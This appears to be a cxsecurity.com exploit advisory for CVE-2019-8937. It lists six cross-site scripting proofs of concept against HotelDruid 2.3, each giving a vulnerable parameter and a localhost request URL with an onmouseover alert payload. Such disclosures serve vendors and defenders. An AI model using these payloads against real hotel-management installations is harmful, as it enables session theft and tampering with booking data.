HotelDruid 2.3 Cross Site Scripting

2019.02.21
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

=========================================================================================== # Exploit Title: Hoteldruid 2.3 - 'nsextt' XSS Injection # CVE: CVE-2019-8937 # Date: 18-02-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://sourceforge.net/projects/hoteldruid/ # Software Link: https://sourceforge.net/projects/hoteldruid/ # Version: v2.3 # Category: Webapps # Tested on: Wamp64, @Win # Software description: HotelDruid is a property management system (PMS) designed to make hotel and hostel rooms bed and breakfast apartments, or any other kind of daily rental easy to manage from a web browser. =========================================================================================== # POC - XSS # Parameters : nsextt # Attack Pattern : x%22+onmouseover%3dalert(0x000981)+x%3d%22 # GET Request : http://localhost/hoteldruid/visualizza_tabelle.php?nsextt=x" onmouseover=alert(0x000981) x=" =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: Hoteldruid 2.3 - 'cambia1' XSS Injection # CVE: CVE-2019-8937 # Date: 18-02-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://sourceforge.net/projects/hoteldruid/ # Software Link: https://sourceforge.net/projects/hoteldruid/ # Version: v2.3 # Category: Webapps # Tested on: Wamp64, @Win # Software description: HotelDruid is a property management system (PMS) designed to make hotel and hostel rooms bed and breakfast apartments, or any other kind of daily rental easy to manage from a web browser. =========================================================================================== # POC - XSS # Parameters : cambia1 # Attack Pattern : " onmouseover="alert(8562604) # POST Request : http://localhost/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671" onmouseover="alert(8562604) # https://i.hizliresim.com/6avvoE.jpg =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: Hoteldruid 2.3 - 'mese_fine' XSS Injection # CVE: CVE-2019-8937 # Date: 18-02-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://sourceforge.net/projects/hoteldruid/ # Software Link: https://sourceforge.net/projects/hoteldruid/ # Version: v2.3 # Category: Webapps # Tested on: Wamp64, @Win # Software description: HotelDruid is a property management system (PMS) designed to make hotel and hostel rooms bed and breakfast apartments, or any other kind of daily rental easy to manage from a web browser. =========================================================================================== # POC - XSS # Parameters : mese_fine # Attack Pattern : " onmouseover="alert(6520859) # POST Request : http://localhost/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13" onmouseover="alert(6520859) # https://i.hizliresim.com/v6NAzD.jpg =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: Hoteldruid 2.3 - 'origine' XSS Injection # CVE: CVE-2019-8937 # Date: 18-02-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://sourceforge.net/projects/hoteldruid/ # Software Link: https://sourceforge.net/projects/hoteldruid/ # Version: v2.3 # Category: Webapps # Tested on: Wamp64, @Win # Software description: HotelDruid is a property management system (PMS) designed to make hotel and hostel rooms bed and breakfast apartments, or any other kind of daily rental easy to manage from a web browser. =========================================================================================== # POC - XSS # Parameters : origine # Attack Pattern : " onmouseover="alert(8987004)) # POST Request : http://localhost/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php" onmouseover="alert(8987004) # https://i.hizliresim.com/v6NAmO.jpg =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: Hoteldruid 2.3 - 'anno' XSS Injection # CVE: CVE-2019-8937 # Date: 18-02-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://sourceforge.net/projects/hoteldruid/ # Software Link: https://sourceforge.net/projects/hoteldruid/ # Version: v2.3 # Category: Webapps # Tested on: Wamp64, @Win # Software description: HotelDruid is a property management system (PMS) designed to make hotel and hostel rooms bed and breakfast apartments, or any other kind of daily rental easy to manage from a web browser. =========================================================================================== # POC - XSS # Parameters : anno # Attack Pattern : " onmouseover="alert(1548690) # POST Request : http://localhost/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019" onmouseover="alert(1548690) # https://i.hizliresim.com/EmAW68.jpg =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: Hoteldruid 2.3 - 'origine' XSS Injection # CVE: CVE-2019-8937 # Date: 18-02-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://sourceforge.net/projects/hoteldruid/ # Software Link: https://sourceforge.net/projects/hoteldruid/ # Version: v2.3 # Category: Webapps # Tested on: Wamp64, @Win # Software description: HotelDruid is a property management system (PMS) designed to make hotel and hostel rooms bed and breakfast apartments, or any other kind of daily rental easy to manage from a web browser. =========================================================================================== # POC - XSS # Parameters : origine # Attack Pattern : " onmouseover="alert(6332576) # POST Request : http://localhost/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php" onmouseover="alert(6332576) # https://i.hizliresim.com/EmAW68.jpg ===========================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top